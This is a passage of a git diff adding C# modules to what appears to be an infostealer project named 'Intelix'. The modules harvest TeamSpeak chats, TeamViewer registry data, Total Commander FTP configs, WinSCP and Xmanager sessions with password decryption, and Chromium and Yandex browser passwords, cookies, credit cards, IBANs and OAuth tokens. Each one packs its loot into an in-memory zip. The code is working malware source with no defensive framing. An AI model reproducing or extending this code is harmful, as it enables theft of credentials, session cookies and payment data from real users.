Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86), "TeamSpeak 3 Client") + }.FirstOrDefault(Directory.Exists); + if (string.IsNullOrEmpty(text)) + { + return; + } + string path = Path.Combine(text, "config", "chats"); + if (!Directory.Exists(path)) + { + return; + } + string[] directories = Directory.GetDirectories(path); + if (directories == null || directories.Length == 0) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "TeamSpeak"; + int num = 1; + string[] array = directories; + for (int i = 0; i < array.Length; i++) + { + string[] array2 = Directory.EnumerateFiles(array[i], "*.txt", SearchOption.TopDirectoryOnly).Where(delegate(string f) + { + string fileName = Path.GetFileName(f); + if (string.IsNullOrEmpty(fileName)) + { + return false; + } + if (!_collectChannelChats && fileName.StartsWith("channel", StringComparison.OrdinalIgnoreCase)) + { + return false; + } + if (!_collectServerLogs && fileName.StartsWith("server", StringComparison.OrdinalIgnoreCase)) + { + return false; + } + try + { + return new FileInfo(f).Length >= _minFileSize; + } + catch + { + return false; + } + }).ToArray(); + if (array2.Length == 0) + { + continue; + } + string[] array3 = array2; + foreach (string text2 in array3) + { + try + { + string text3 = $"TeamSpeak\\{num}\\" + Path.GetFileName(text2); + zip.AddFile(text3, File.ReadAllBytes(text2)); + counterApplications.Files.Add(text2 + " => " + text3); + } + catch + { + } + } + num++; + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add("TeamSpeak\\"); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/TeamViewer.cs b/New/Intelix.Targets.Applications/TeamViewer.cs new file mode 100644 index 0000000..d922218 --- /dev/null +++ b/New/Intelix.Targets.Applications/TeamViewer.cs @@ -0,0 +1,33 @@ +using System.Collections.Generic; +using System.Linq; +using Intelix.Helper; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class TeamViewer : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + List list = new List(); + using (RegistryKey key = Registry.CurrentUser.OpenSubKey("SOFTWARE\\TeamViewer")) + { + list.AddRange(RegistryParser.ParseKey(key)); + } + using (RegistryKey key2 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\TeamViewer", writable: false)) + { + list.AddRange(RegistryParser.ParseKey(key2)); + } + if (list.Any()) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "TeamViewer"; + string text = "TeamViewer\\Registry.txt"; + zip.AddTextFile(text, string.Join("\n", list)); + counterApplications.Files.Add("SOFTWARE\\TeamViewer => " + text); + counterApplications.Files.Add(text); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/TotalCommander.cs b/New/Intelix.Targets.Applications/TotalCommander.cs new file mode 100644 index 0000000..0a76c90 --- /dev/null +++ b/New/Intelix.Targets.Applications/TotalCommander.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Applications; + +public class TotalCommander : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "GHISLER", "wcx_ftp.ini"); + if (File.Exists(text)) + { + string text2 = "Total Commander\\wcx_ftp.ini"; + zip.AddFile(text2, File.ReadAllBytes(text)); + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Total Commander"; + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Applications.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Applications/WinSCP.cs b/New/Intelix.Targets.Applications/WinSCP.cs new file mode 100644 index 0000000..d08d010 --- /dev/null +++ b/New/Intelix.Targets.Applications/WinSCP.cs @@ -0,0 +1,125 @@ +using System.Collections.Generic; +using System.Linq; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Applications; + +public class WinSCP : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + List list = new List(); + List list2 = new List(); + try + { + using RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software\\Martin Prikryl\\WinSCP 2\\Sessions"); + if (registryKey == null) + { + return; + } + string[] subKeyNames = registryKey.GetSubKeyNames(); + foreach (string text in subKeyNames) + { + string text2 = "Software\\Martin Prikryl\\WinSCP 2\\Sessions\\" + text; + using RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey(text2); + if (registryKey2 != null) + { + string text3 = registryKey2.GetValue("HostName")?.ToString(); + if (!string.IsNullOrWhiteSpace(text3)) + { + string text4 = registryKey2.GetValue("UserName")?.ToString(); + string pass = registryKey2.GetValue("Password")?.ToString(); + string text5 = DecryptPassword(text4, pass, text3); + string text6 = registryKey2.GetValue("PortNumber")?.ToString(); + list.Add("Session: " + text + "\nUrl: " + text3 + ":" + text6 + "\nUsername: " + text4 + "\nPassword: " + text5); + list2.Add("HKEY_CURRENT_USER\\" + text2); + } + } + } + } + catch + { + } + if (list.Count <= 0) + { + return; + } + string text7 = "WinScp\\Sessions.txt"; + zip.AddTextFile(text7, string.Join("\n\n", list)); + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "WinSCP"; + foreach (string item in list2) + { + counterApplications.Files.Add(item + " => " + text7); + } + counterApplications.Files.Add(text7); + counter.Applications.Add(counterApplications); + } + + private static int DecryptNextChar(List charList) + { + return 0xFF ^ ((((int.Parse(charList[0]) << 4) + int.Parse(charList[1])) ^ 0xA3) & 0xFF); + } + + private static string DecryptPassword(string user, string pass, string host) + { + if (string.IsNullOrEmpty(user) || string.IsNullOrEmpty(pass) || string.IsNullOrEmpty(host)) + { + return ""; + } + try + { + List list = pass.Select((char c) => c.ToString()).ToList(); + List list2 = new List(); + foreach (string item in list) + { + switch (item) + { + case "A": + list2.Add("10"); + break; + case "B": + list2.Add("11"); + break; + case "C": + list2.Add("12"); + break; + case "D": + list2.Add("13"); + break; + case "E": + list2.Add("14"); + break; + case "F": + list2.Add("15"); + break; + default: + list2.Add(item); + break; + } + } + if (DecryptNextChar(list2) == 255) + { + DecryptNextChar(list2); + } + list2.RemoveRange(0, 4); + int num = DecryptNextChar(list2); + list2.RemoveRange(0, 2); + int count = DecryptNextChar(list2) * 2; + list2.RemoveRange(0, count); + string text = ""; + for (int num2 = 0; num2 < num; num2++) + { + text += (char)DecryptNextChar(list2); + list2.RemoveRange(0, 2); + } + string oldValue = user + host; + return text.Replace(oldValue, ""); + } + catch + { + return ""; + } + } +} diff --git a/New/Intelix.Targets.Applications/Xmanager.cs b/New/Intelix.Targets.Applications/Xmanager.cs new file mode 100644 index 0000000..330c4bf --- /dev/null +++ b/New/Intelix.Targets.Applications/Xmanager.cs @@ -0,0 +1,136 @@ +using System; +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Security.Cryptography; +using System.Security.Principal; +using System.Text; +using System.Text.RegularExpressions; +using System.Threading.Tasks; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; + +namespace Intelix.Targets.Applications; + +public class Xmanager : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + WindowsIdentity current = WindowsIdentity.GetCurrent(); + string sid = current.User.ToString(); + DirectoryInfo root = new DirectoryInfo(Environment.GetFolderPath(Environment.SpecialFolder.Personal)); + List source = Search(root); + ConcurrentBag lines = new ConcurrentBag(); + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Xmanager"; + Parallel.ForEach(source, delegate(string sessionFile) + { + List list = ReadConfigFile(sessionFile); + if (list.Count >= 4) + { + string text2 = list[0]?.Trim() ?? ""; + string text3 = list[1] ?? ""; + string text4 = list[2] ?? ""; + string text5 = list[3] ?? ""; + string text6 = " Version : " + text2 + "\n"; + text6 = text6 + " Host : " + text3 + "\n"; + text6 = text6 + " User : " + text4 + "\n"; + text6 = text6 + " RawPass : " + text5 + "\n"; + string text7 = DecryptToString(text4, sid, text5, text2); + text6 = text6 + " Decrypted: " + text7 + "\n\n"; + lines.Add(text6); + counterApplications.Files.Add(sessionFile + " => Xmanager\\sessions.txt"); + } + }); + if (lines.Any()) + { + string text = "Xmanager\\sessions.txt"; + zip.AddTextFile(text, string.Concat(lines)); + counterApplications.Files.Add(text); + counter.Applications.Add(counterApplications); + } + } + + private List Search(DirectoryInfo root) + { + List list = new List(); + if (!root.Exists) + { + return list; + } + Stack stack = new Stack(); + stack.Push(root); + while (stack.Count > 0) + { + DirectoryInfo directoryInfo = stack.Pop(); + try + { + FileInfo[] files = directoryInfo.GetFiles(); + for (int i = 0; i < files.Length; i++) + { + string fullName = files[i].FullName; + if (fullName.EndsWith(".xsh", StringComparison.OrdinalIgnoreCase) || fullName.EndsWith(".xfp", StringComparison.OrdinalIgnoreCase)) + { + list.Add(fullName); + } + } + DirectoryInfo[] directories = directoryInfo.GetDirectories(); + foreach (DirectoryInfo item in directories) + { + stack.Push(item); + } + } + catch + { + } + } + return list; + } + + private List ReadConfigFile(string path) + { + string input = File.ReadAllText(path); + string value = Regex.Match(input, "Version=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value2 = Regex.Match(input, "Host=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value3 = Regex.Match(input, "UserName=(.*)", RegexOptions.Multiline).Groups[1].Value; + string value4 = Regex.Match(input, "Password=(.*)", RegexOptions.Multiline).Groups[1].Value; + List list = new List { value, value2, value3 }; + if (!string.IsNullOrEmpty(value4) && value4.Length > 3) + { + list.Add(value4); + } + return list; + } + + private string DecryptToString(string username, string sid, string rawPass, string ver) + { + byte[] array = Convert.FromBase64String(rawPass); + byte[] key; + if (ver.StartsWith("5.0") || ver.StartsWith("4") || ver.StartsWith("3") || ver.StartsWith("2")) + { + key = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes("!X@s#h$e%l^l&")); + } + else if (ver.StartsWith("5.1") || ver.StartsWith("5.2")) + { + key = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(sid)); + } + else if (ver.StartsWith("5") || ver.StartsWith("6") || ver.StartsWith("7.0")) + { + key = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(username + sid)); + } + else + { + string s = new string((new string(username.ToCharArray().Reverse().ToArray()) + sid).ToCharArray().Reverse().ToArray()); + key = new SHA256Managed().ComputeHash(Encoding.ASCII.GetBytes(s)); + } + byte[] array2 = new byte[array.Length - 32]; + Array.Copy(array, 0, array2, 0, array2.Length); + byte[] array3 = RC4Crypt.Decrypt(key, array2); + if (array3 == null) + { + return string.Empty; + } + return Encoding.ASCII.GetString(array3); + } +} diff --git a/New/Intelix.Targets.Browsers/._Chromium.cs b/New/Intelix.Targets.Browsers/._Chromium.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Browsers/._Chromium.cs differ diff --git a/New/Intelix.Targets.Browsers/._CryptoChromium.cs b/New/Intelix.Targets.Browsers/._CryptoChromium.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Browsers/._CryptoChromium.cs differ diff --git a/New/Intelix.Targets.Browsers/._CryptoGecko.cs b/New/Intelix.Targets.Browsers/._CryptoGecko.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Browsers/._CryptoGecko.cs differ diff --git a/New/Intelix.Targets.Browsers/._Gecko.cs b/New/Intelix.Targets.Browsers/._Gecko.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Browsers/._Gecko.cs differ diff --git a/New/Intelix.Targets.Browsers/._UserAgentGenerator.cs b/New/Intelix.Targets.Browsers/._UserAgentGenerator.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Browsers/._UserAgentGenerator.cs differ diff --git a/New/Intelix.Targets.Browsers/Chromium.cs b/New/Intelix.Targets.Browsers/Chromium.cs new file mode 100644 index 0000000..75d4f62 --- /dev/null +++ b/New/Intelix.Targets.Browsers/Chromium.cs @@ -0,0 +1,583 @@ +using System; +using System.Collections.Concurrent; +using System.Collections.Generic; +using System.IO; +using System.Text; +using System.Text.RegularExpressions; +using System.Threading.Tasks; +using Intelix.Helper; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; +using Intelix.Helper.Sql; + +namespace Intelix.Targets.Browsers; + +public class Chromium : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + Parallel.ForEach(Paths.Chromium, delegate(string browser) + { + if (Directory.Exists(browser)) + { + Parallel.ForEach(Directory.GetDirectories(browser), delegate(string profile) + { + ProfileCollect(zip, counter, browser, profile); + }); + } + }); + } + + private void ProfileCollect(InMemoryZip zip, Counter counter, string browser, string profile) + { + string localstate = browser + "\\Local State"; + string browsername = Paths.GetBrowserName(browser); + string profilename = Path.GetFileName(profile); + byte[] masterv10 = LocalState.MasterKeyV10(localstate); + byte[] masterv20 = LocalState.MasterKeyV20(localstate); + Counter.CounterBrowser counterBrowser = new Counter.CounterBrowser(); + counterBrowser.Profile = profile; + counterBrowser.BrowserName = browsername; + object[][] source = new object[7][] + { + new object[3] + { + "Login Data", + Path.Combine(profile, "Login Data"), + new string[1] { "logins" } + }, + new object[3] + { + "Login Data For Account", + Path.Combine(profile, "Login Data For Account"), + new string[1] { "logins" } + }, + new object[3] + { + "Network Cookies", + Path.Combine(profile, "Network", "Cookies"), + new string[1] { "cookies" } + }, + new object[3] + { + "Cookies", + Path.Combine(profile, "Cookies"), + new string[1] { "cookies" } + }, + new object[3] + { + "Web Data", + Path.Combine(profile, "Web Data"), + new string[5] { "AutoFill", "credit_cards", "token_service", "masked_credit_cards", "masked_ibans" } + }, + new object[3] + { + "Ya Passman Data", + Path.Combine(profile, "Ya Passman Data"), + new string[1] { "logins" } + }, + new object[3] + { + "Ya Credit Cards", + Path.Combine(profile, "Ya Credit Cards"), + new string[1] { "records" } + } + }; + Dictionary> handlers = new Dictionary>(StringComparer.OrdinalIgnoreCase) + { + { + "Login Data/logins", + delegate(SqLite sSqLite) + { + Password(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Login Data For Account/logins", + delegate(SqLite sSqLite) + { + Password(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Cookies/cookies", + delegate(SqLite sSqLite) + { + Cookies(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Network Cookies/cookies", + delegate(SqLite sSqLite) + { + Cookies(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Web Data/AutoFill", + delegate(SqLite sSqLite) + { + AutoFill(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Web Data/credit_cards", + delegate(SqLite sSqLite) + { + CreditCards(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Web Data/token_service", + delegate(SqLite sSqLite) + { + TokenRestore(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Web Data/masked_credit_cards", + delegate(SqLite sSqLite) + { + MaskCreditCards(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Web Data/masked_ibans", + delegate(SqLite sSqLite) + { + MaskedIbans(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Ya Passman Data/logins", + delegate(SqLite sSqLite) + { + YandexPassword(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + }, + { + "Ya Credit Cards/records", + delegate(SqLite sSqLite) + { + YandexGetCard(zip, counterBrowser, sSqLite, profilename, browsername, masterv10, masterv20); + } + } + }; + Parallel.ForEach(source, delegate(object[] file) + { + string name = (string)file[0]; + string path = (string)file[1]; + string[] source2 = (string[])file[2]; + if (File.Exists(path)) + { + byte[] bytes; + try + { + bytes = File.ReadAllBytes(path); + } + catch + { + return; + } + Parallel.ForEach(source2, delegate(string table) + { + try + { + SqLite sqLite = new SqLite(bytes); + sqLite.ReadTable(table); + string key = name + "/" + table; + if (handlers.TryGetValue(key, out var value)) + { + value(sqLite); + } + } + catch + { + } + }); + } + }); + if ((long)counterBrowser.Cookies != 0L || (long)counterBrowser.Password != 0L || (long)counterBrowser.CreditCards != 0L || (long)counterBrowser.AutoFill != 0L || (long)counterBrowser.RestoreToken != 0L || (long)counterBrowser.MaskCreditCard != 0L || (long)counterBrowser.MaskedIban != 0L) + { + counter.Browsers.Add(counterBrowser); + } + } + + private void Password(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + if (masterv10 == null && masterv20 == null) + { + return; + } + ConcurrentBag lines = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + string value = sSqLite.GetValue(i, 0); + string value2 = sSqLite.GetValue(i, 3); + byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 5)); + if (bytes != null && !string.IsNullOrEmpty(value) && !string.IsNullOrEmpty(value2)) + { + byte[] array = AesGcm.DecryptBrowser(bytes, masterv10, masterv20, checkprefix: false); + if (array != null) + { + string text = Encoding.UTF8.GetString(array); + string item = "Hostname: " + value + "\nUsername: " + value2 + "\nPassword: " + text + "\n\n"; + lines.Add(item); + ++counterBrowser.Password; + } + } + } + catch + { + } + }); + zip.AddTextFile("Passwords\\Passwords_[" + browsername + "]" + profilename + ".txt", string.Concat(lines)); + } + + private void Cookies(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + if (masterv10 == null && masterv20 == null) + { + return; + } + ConcurrentBag linesSanitized = new ConcurrentBag(); + ConcurrentBag linesRaw = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 5)); + string value = sSqLite.GetValue(i, 4); + string value2 = sSqLite.GetValue(i, 1); + string value3 = sSqLite.GetValue(i, 3); + string value4 = sSqLite.GetValue(i, 6); + string value5 = sSqLite.GetValue(i, 7); + string isSecure = sSqLite.GetValue(i, 8); + if (!string.IsNullOrEmpty(value2) && !string.IsNullOrEmpty(value3) && !string.IsNullOrEmpty(value4) && !string.IsNullOrEmpty(value5)) + { + string secureFlag = (isSecure == "1") ? "TRUE" : "FALSE"; + long chromeTimestamp; + string expiryUnix; + if (long.TryParse(value5, out chromeTimestamp) && chromeTimestamp > 0) + { + long unixTimestamp = (chromeTimestamp / 1000000) - 11644473600L; + expiryUnix = unixTimestamp.ToString(); + } + else + { + expiryUnix = value5; + } + if (!string.IsNullOrEmpty(value)) + { + string sanitizedValue = Regex.Replace(value, @"[\x00-\x1F\x7F]", ""); + string itemSanitized = value2 + "\tTRUE\t" + value4 + "\t" + secureFlag + "\t" + expiryUnix + "\t" + value3 + "\t" + sanitizedValue + "\n"; + string itemRaw = value2 + "\tTRUE\t" + value4 + "\t" + secureFlag + "\t" + expiryUnix + "\t" + value3 + "\t" + value + "\n"; + linesSanitized.Add(itemSanitized); + linesRaw.Add(itemRaw); + } + else + { + byte[] array = AesGcm.DecryptBrowser(bytes, masterv10, masterv20, checkprefix: true); + if (array != null) + { + string text = Encoding.UTF8.GetString(array); + string sanitizedValue = Regex.Replace(text, @"[\x00-\x1F\x7F]", ""); + string itemSanitized = value2 + "\tTRUE\t" + value4 + "\t" + secureFlag + "\t" + expiryUnix + "\t" + value3 + "\t" + sanitizedValue + "\n"; + string itemRaw = value2 + "\tTRUE\t" + value4 + "\t" + secureFlag + "\t" + expiryUnix + "\t" + value3 + "\t" + text + "\n"; + linesSanitized.Add(itemSanitized); + linesRaw.Add(itemRaw); + ++counterBrowser.Cookies; + } + } + } + } + catch + { + } + }); + string header = "# Netscape HTTP Cookie File\n# This is a generated file! Do not edit.\n\n"; + zip.AddTextFile("Cookies\\Cookies_[" + browsername + "]" + profilename + ".txt", header + string.Concat(linesSanitized)); + zip.AddTextFile("Cookies\\Cookies_[" + browsername + "]" + profilename + "_raw.txt", header + string.Concat(linesRaw)); + } + + private void AutoFill(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + ConcurrentBag lines = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + string value = sSqLite.GetValue(i, 0); + string value2 = sSqLite.GetValue(i, 1); + if (!string.IsNullOrEmpty(value2) && !string.IsNullOrEmpty(value)) + { + string item = "Name: " + value + "\nValue: " + value2 + "\n\n"; + lines.Add(item); + ++counterBrowser.AutoFill; + } + } + catch + { + } + }); + zip.AddTextFile("AutoFills\\AutoFill_[" + browsername + "]" + profilename + ".txt", string.Concat(lines)); + } + + private void CreditCards(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + if (masterv10 == null && masterv20 == null) + { + return; + } + ConcurrentBag lines = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 4)); + string value = sSqLite.GetValue(i, 3); + string value2 = sSqLite.GetValue(i, 2); + string value3 = sSqLite.GetValue(i, 1); + if (bytes != null && !string.IsNullOrEmpty(value) && !string.IsNullOrEmpty(value2) && !string.IsNullOrEmpty(value3)) + { + byte[] array = AesGcm.DecryptBrowser(bytes, masterv10, masterv20, checkprefix: false); + if (array != null) + { + string text = Encoding.UTF8.GetString(array); + string item = "Number: " + text + "\nExp: " + value2 + "/" + value + "\nHolder: " + value3 + "\n\n"; + lines.Add(item); + ++counterBrowser.CreditCards; + } + } + } + catch + { + } + }); + zip.AddTextFile("CreditCards\\CreditCards_[" + browsername + "]" + profilename + ".txt", string.Concat(lines)); + } + + private void TokenRestore(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + if (masterv10 == null && masterv20 == null) + { + return; + } + ConcurrentBag lines = new ConcurrentBag(); + ConcurrentBag restoredCookies = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + string value = sSqLite.GetValue(i, 0); + byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 1)); + if (bytes != null) + { + byte[] array = AesGcm.DecryptBrowser(bytes, masterv10, masterv20, checkprefix: false); + if (array != null) + { + string text = Encoding.UTF8.GetString(array) + ":" + value.Replace("AccountId-", "") + "\n"; + lines.Add(text); + ++counterBrowser.RestoreToken; + if (value.Contains("AccountId")) + { + string restored = RestoreCookies.CRestore(text); + if (!string.IsNullOrEmpty(restored)) + { + restoredCookies.Add("# Token: " + value + "\n" + restored + "\n"); + } + } + } + } + } + catch + { + } + }); + zip.AddTextFile("RestoreToken\\RestoreToken_[" + browsername + "]" + profilename + ".txt", string.Concat(lines)); + if (restoredCookies.Count > 0) + { + string header = "# Netscape HTTP Cookie File\n# Google OAuth Restored Cookies\n\n"; + zip.AddTextFile("Cookies\\CookiesRestore_[" + browsername + "]" + profilename + ".txt", header + string.Concat(restoredCookies)); + } + } + + private void YandexPassword(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + if (masterv10 == null) + { + return; + } + byte[] encryptionKey = LocalEncryptor.ExtractEncryptionKey(sSqLite, masterv10); + if (encryptionKey == null || encryptionKey.Length != 32) + { + return; + } + ConcurrentBag lines = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + string value = sSqLite.GetValue(i, 0); + string value2 = sSqLite.GetValue(i, 2); + string value3 = sSqLite.GetValue(i, 3); + string value4 = sSqLite.GetValue(i, 4); + string value5 = sSqLite.GetValue(i, 7); + byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 5)); + if (bytes.Length != 0) + { + byte[] bytes2 = YaAuthenticatedData.Decrypt(encryptionKey, bytes, value, value2, value4, value3, value5); + string item = "Hostname: " + value + "\nUsername: " + value3 + "\nPassword: " + Encoding.UTF8.GetString(bytes2) + "\n\n"; + lines.Add(item); + ++counterBrowser.Password; + } + } + catch + { + } + }); + zip.AddTextFile("Passwords\\Passwords_[" + browsername + "]" + profilename + ".txt", string.Concat(lines)); + } + + private void YandexGetCard(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + if (masterv10 == null) + { + return; + } + byte[] encryptionKey = LocalEncryptor.ExtractEncryptionKey(sSqLite, masterv10); + if (encryptionKey == null || encryptionKey.Length != 32) + { + return; + } + ConcurrentBag lines = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + byte[] bytes = Encoding.Default.GetBytes(sSqLite.GetValue(i, 0)); + byte[] bytes2 = Encoding.Default.GetBytes(sSqLite.GetValue(i, 2)); + string value = sSqLite.GetValue(i, 1); + byte[] array = new byte[12]; + Array.Copy(bytes2, 0, array, 0, 12); + int num = bytes2.Length - 12 - 16; + byte[] array2 = new byte[num]; + Array.Copy(bytes2, 12, array2, 0, num); + byte[] array3 = new byte[16]; + Array.Copy(bytes2, bytes2.Length - 16, array3, 0, 16); + string input = Encoding.UTF8.GetString(AesGcm256.Decrypt(encryptionKey, array, bytes, array2, array3)); + Match match = Regex.Match(input, "[\"']?full_card_number[\"']?\\s*:\\s*[\"']?(?[\\d\\s\\-]+)[\"']?", RegexOptions.IgnoreCase); + string text = (match.Success ? match.Groups["v"].Value.Trim() : null); + if (string.IsNullOrEmpty(text)) + { + Match match2 = Regex.Match(input, "[\"']?(?:card_number|number)[\"']?\\s*:\\s*[\"']?(?[\\d\\s\\-]+)[\"']?", RegexOptions.IgnoreCase); + text = (match2.Success ? match2.Groups["v"].Value.Trim() : null); + } + Match match3 = Regex.Match(value, "[\"']?expire_date_month[\"']?\\s*:\\s*[\"']?(?\\d{1,2})[\"']?", RegexOptions.IgnoreCase); + Match match4 = Regex.Match(value, "[\"']?expire_date_year[\"']?\\s*:\\s*[\"']?(?\\d{2,4})[\"']?", RegexOptions.IgnoreCase); + string text2 = (match3.Success ? match3.Groups["m"].Value.PadLeft(2, '0') : null); + string text3 = (match4.Success ? match4.Groups["y"].Value : null); + Match match5 = Regex.Match(value, "[\"']?card_holder[\"']?\\s*:\\s*[\"'](?(?:\\\\.|[^\"])*)[\"']", RegexOptions.IgnoreCase | RegexOptions.Singleline); + string text4 = (match5.Success ? match5.Groups["v"].Value : null); + if (string.IsNullOrEmpty(text4)) + { + Match match6 = Regex.Match(value, "[\"']?(?:cardholder|holder|name)[\"']?\\s*:\\s*[\"'](?(?:\\\\.|[^\"])*)[\"']", RegexOptions.IgnoreCase | RegexOptions.Singleline); + text4 = (match6.Success ? match6.Groups["v"].Value : text4); + } + if (!string.IsNullOrEmpty(text4)) + { + text4 = Regex.Unescape(text4); + text4 = Regex.Replace(text4, "\\\\u([0-9A-Fa-f]{4})", (Match m) => ((char)Convert.ToInt32(m.Groups[1].Value, 16)).ToString()); + text4 = text4.Trim(); + if (Regex.IsMatch(text4, "^[A-Za-z0-9\\+/=]{8,}$")) + { + try + { + byte[] bytes3 = Convert.FromBase64String(text4); + string text5 = Encoding.UTF8.GetString(bytes3); + if (!string.IsNullOrWhiteSpace(text5)) + { + text4 = text5.Trim(); + } + } + catch + { + } + } + } + if (string.IsNullOrEmpty(text)) + { + text = "Unknown"; + } + if (string.IsNullOrEmpty(text2)) + { + text2 = "Unknown"; + } + if (string.IsNullOrEmpty(text3)) + { + text3 = "Unknown"; + } + if (string.IsNullOrEmpty(text4)) + { + text4 = "Unknown"; + } + string item = "Number: " + text + "\nExp: " + text2 + "/" + text3 + "\nHolder: " + text4 + "\n\n"; + lines.Add(item); + ++counterBrowser.CreditCards; + } + catch + { + } + }); + zip.AddTextFile("CreditCards\\CreditCards_[" + browsername + "]" + profilename + ".txt", string.Concat(lines)); + } + + private void MaskCreditCards(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + ConcurrentBag lines = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + string value = sSqLite.GetValue(i, 1); + string value2 = sSqLite.GetValue(i, 2); + string value3 = sSqLite.GetValue(i, 3); + string value4 = sSqLite.GetValue(i, 4); + string value5 = sSqLite.GetValue(i, 5); + string value6 = sSqLite.GetValue(i, 6); + string value7 = sSqLite.GetValue(i, 7); + string value8 = sSqLite.GetValue(i, 12); + string item = "Name On Card: " + value + "\nNetwork: " + value2 + "\nCard Last Number: " + value3 + "\nExp: " + value4 + "/" + value5 + "\nBank Name: " + value6 + "\nNickName: " + value7 + "\nProduct Description: " + value8 + "\n\n"; + lines.Add(item); + ++counterBrowser.MaskCreditCard; + } + catch + { + } + }); + zip.AddTextFile("MaskCreditCards\\MaskCreditCards_[" + browsername + "]" + profilename + ".txt", string.Concat(lines)); + } + + private void MaskedIbans(InMemoryZip zip, Counter.CounterBrowser counterBrowser, SqLite sSqLite, string profilename, string browsername, byte[] masterv10, byte[] masterv20) + { + ConcurrentBag lines = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + string value = sSqLite.GetValue(i, 1); + string value2 = sSqLite.GetValue(i, 2); + string value3 = sSqLite.GetValue(i, 3); + string item = "Nickname: " + value3 + "\nPrefix: " + value + "\nSuffix: " + value2 + 